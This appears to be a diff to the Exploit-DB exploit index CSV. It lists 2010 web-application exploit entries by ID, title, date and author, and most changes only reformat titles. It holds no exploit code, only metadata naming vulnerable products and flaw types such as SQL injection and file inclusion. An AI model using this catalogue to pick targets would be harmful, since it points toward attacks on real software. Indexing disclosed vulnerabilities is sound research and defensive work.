id,file,description,date,author,platform,type,port 11560,platforms/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11563,platforms/php/webapps/11563.txt,"kalimat new system 1.0 - 'index.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0 11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection",2010-02-24,Gamoscu,php,webapps,0 -11565,platforms/php/webapps/11565.txt,"PHPCOIN 1.2.1 - (mod.php) SQL Injection",2010-02-24,BAYBORA,php,webapps,0 +11565,platforms/php/webapps/11565.txt,"PHPCOIN 1.2.1 - 'mod.php' SQL Injection",2010-02-24,BAYBORA,php,webapps,0 11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script - Multiple SQL Injections",2010-02-24,"Easy Laster",php,webapps,0 11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 @@ -22586,7 +22589,7 @@ id,file,description,date,author,platform,type,port 11636,platforms/php/webapps/11636.php,"Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0 11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - news.php 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 -11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - (mod.php) Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 +11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS - (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 @@ -22603,7 +22606,7 @@ id,file,description,date,author,platform,type,port 11677,platforms/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection",2010-03-10,"Yaniv Miron",hardware,webapps,0 11678,platforms/php/webapps/11678.txt,"PhpCityPortal - Multiple Vulnerabilities",2010-03-10,R3d-D3V!L,php,webapps,0 11679,platforms/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script - 'search_result.php' SQL Injection",2010-03-10,"Easy Laster",php,webapps,0 -11680,platforms/php/webapps/11680.txt,"Anantasoft Gazelle CMS - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps,0 +11680,platforms/php/webapps/11680.txt,"Gazelle CMS - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps,0 11681,platforms/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,cr4wl3r,php,webapps,0 11684,platforms/php/webapps/11684.txt,"Joomla! Component com_about - SQL Injection",2010-03-11,snakespc,php,webapps,0 11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting",2010-03-11,ITSecTeam,php,webapps,0 @@ -22733,7 +22736,7 @@ id,file,description,date,author,platform,type,port 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0 -11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - (/photo.php) SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 +11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - '/photo.php' SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusion",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 11884,platforms/php/webapps/11884.txt,"Joomla! Component dcsFlashGames 2.0RC1 - SQL Injection (catid)",2010-03-26,kaMtiEz,php,webapps,0 @@ -22971,7 +22974,7 @@ id,file,description,date,author,platform,type,port 12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0 -12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 +12254,platforms/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0 @@ -23037,7 +23040,7 @@ id,file,description,date,author,platform,type,port 12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-24,cr4wl3r,php,webapps,0 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 -12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 +12371,platforms/php/webapps/12371.txt,"WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 @@ -23116,7 +23119,7 @@ id,file,description,date,author,platform,type,port 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,cr4wl3r,php,webapps,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 -12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 +12481,platforms/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-05-02,cr4wl3r,php,webapps,0 @@ -23152,7 +23155,7 @@ id,file,description,date,author,platform,type,port 12547,platforms/php/webapps/12547.txt,"e-webtech - 'new.asp?id=' SQL Injection",2010-05-10,protocol,php,webapps,0 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 12551,platforms/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,php,webapps,0 -12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - (makale.php id) SQL Injection",2010-05-10,CoBRa_21,php,webapps,0 +12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - 'makale.php id' SQL Injection",2010-05-10,CoBRa_21,php,webapps,0 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps,0 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 @@ -23192,7 +23195,7 @@ id,file,description,date,author,platform,type,port 12601,platforms/php/webapps/12601.txt,"Joomla! Component JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion",2010-05-14,ALTBTA,php,webapps,0 -12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0 +12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - 'photogallery_open.php' SQL Injection",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0 12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0 12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0 @@ -23301,11 +23304,11 @@ id,file,description,date,author,platform,type,port 12749,platforms/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps,0 12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery",2010-05-26,l3D,windows,webapps,0 12754,platforms/php/webapps/12754.html,"Easy Address book WebServer 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,php,webapps,0 -12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - (itemdetail.php & shop.php) SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 +12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - 'itemdetail.php & shop.php' SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 12756,platforms/php/webapps/12756.txt,"Spaceacre - 'index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,php,webapps,0 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12763,platforms/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,php,webapps,0 -12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 +12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - 'trace.php' Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 12767,platforms/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,php,webapps,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0 @@ -23455,7 +23458,7 @@ id,file,description,date,author,platform,type,port 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. - SQL Injection",2010-06-13,Mr.P3rfekT,php,webapps,0 13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,php,webapps,0 13857,platforms/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 - SQL Injection (calbums)",2010-06-13,CoBRa_21,php,webapps,0 -13858,platforms/php/webapps/13858.txt,"Eyeland Studio Inc. - (game.php) SQL Injection",2010-06-13,CoBRa_21,php,webapps,0 +13858,platforms/php/webapps/13858.txt,"Eyeland Studio Inc. - 'game.php' SQL Injection",2010-06-13,CoBRa_21,php,webapps,0 13859,platforms/asp/webapps/13859.txt,"Digital Interchange Document Library - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 13860,platforms/asp/webapps/13860.txt,"Digital Interchange Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 13861,platforms/asp/webapps/13861.txt,"Real-time ASP Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 @@ -23599,7 +23602,7 @@ id,file,description,date,author,platform,type,port 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps,0 -14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 +14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - 'videos.php' SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript - 'ypncat_id' SQL Injection",2010-06-29,v3n0m,php,webapps,0 14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 @@ -23653,7 +23656,7 @@ id,file,description,date,author,platform,type,port 14196,platforms/php/webapps/14196.txt,"Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 -14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 +14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - 'show.php?id=' SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14201,platforms/php/webapps/14201.txt,"PHPaaCMS - 'list.php?id' SQL Injection",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software - Local File Inclusion",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 @@ -23682,9 +23685,9 @@ id,file,description,date,author,platform,type,port 14238,platforms/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps,0 14239,platforms/php/webapps/14239.txt,"Auto Dealer - SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 14240,platforms/php/webapps/14240.txt,"BS Auto Classifieds - 'info.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 -14241,platforms/php/webapps/14241.txt,"BS Business Directory - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 -14242,platforms/php/webapps/14242.txt,"BS Classifieds Ads - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 -14243,platforms/php/webapps/14243.txt,"BS Events Directory - (articlesdetails.php) SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 +14241,platforms/php/webapps/14241.txt,"BS Business Directory - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 +14242,platforms/php/webapps/14242.txt,"BS Classifieds Ads - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 +14243,platforms/php/webapps/14243.txt,"BS Events Directory - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14245,platforms/php/webapps/14245.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 14249,platforms/php/webapps/14249.txt,"Joomla! Component AutarTimonial 1.0.8 - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 @@ -23757,8 +23760,8 @@ id,file,description,date,author,platform,type,port 14381,platforms/php/webapps/14381.txt,"Group Office - Remote Command Execution",2010-07-16,"ADEO Security",php,webapps,0 14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA - Cross-Site Request Forgery",2010-07-16,Markot,windows,webapps,0 14383,platforms/php/webapps/14383.txt,"Group Office - 'comment_id' SQL Injection",2010-07-16,"Canberk BOLAT",php,webapps,0 -14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection",2010-07-20,v0calist,asp,webapps,0 -14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection",2010-07-20,CoBRa_21,asp,webapps,0 +14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - 'makaledetay.asp' SQL Injection",2010-07-20,v0calist,asp,webapps,0 +14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - 'haberdetay.asp' SQL Injection",2010-07-20,CoBRa_21,asp,webapps,0 14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0 14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script - Arbitrary File Upload",2010-07-17,Sid3^effects,php,webapps,0 14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0 @@ -23793,7 +23796,7 @@ id,file,description,date,author,platform,type,port 14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0 -14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 +14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - 'ecard.php' SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 14457,platforms/php/webapps/14457.txt,"DM FileManager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps,0 @@ -23802,7 +23805,7 @@ id,file,description,date,author,platform,type,port 14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0 14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla! Component com_itarmory - SQL Injection",2010-07-24,Craw,php,webapps,0 -14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0 +14465,platforms/php/webapps/14465.txt,"sNews 1.7 - 'index.php?category' SQL Injection",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0 14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0 @@ -23881,7 +23884,7 @@ id,file,description,date,author,platform,type,port 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection",2010-08-22,L1nK,asp,webapps,0 14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion",2010-08-23,LoSt.HaCkEr,php,webapps,0 -14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 +14714,platforms/php/webapps/14714.txt,"Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 14716,platforms/php/webapps/14716.txt,"AneCMS - /registre/next SQL Injection",2010-08-23,Sweet,php,webapps,0 14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0 14718,platforms/php/webapps/14718.txt,"Joomla! Component 'com_zoomportfolio' - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0 @@ -23906,7 +23909,7 @@ id,file,description,date,author,platform,type,port 14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 -14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 +14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - 'settings.cdb' Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 14834,platforms/php/webapps/14834.txt,"Max's Guestbook - HTML Injection / Cross-Site Scripting",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0 @@ -23916,7 +23919,7 @@ id,file,description,date,author,platform,type,port 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0 14845,platforms/php/webapps/14845.txt,"Joomla! Component PicSell 1.0 - Local File Disclosure",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0 -14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0 +14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - 'viewpost.php' SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 @@ -23926,7 +23929,7 @@ id,file,description,date,author,platform,type,port 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14884,platforms/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 14887,platforms/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 -14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",php,webapps,0 +14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - 'addcomment.php' Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 @@ -24043,12 +24046,12 @@ id,file,description,date,author,platform,type,port 15174,platforms/php/webapps/15174.txt,"Tiki Wiki CMS Groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 -15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 +15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - 'index.php?forumID' SQL Injection",2010-10-01,Shamus,php,webapps,0 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python)",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 -15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 +15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 @@ -24060,8 +24063,8 @@ id,file,description,date,author,platform,type,port 15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection",2010-10-05,Shamus,php,webapps,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Arbitrary File Upload",2010-10-07,KnocKout,php,webapps,0 -15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0 -15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection",2010-10-08,ZoRLu,asp,webapps,0 +15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - 'oku.asp?makale_id' SQL Injection",2010-10-07,KnocKout,asp,webapps,0 +15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - 'arsiv.asp tarih' SQL 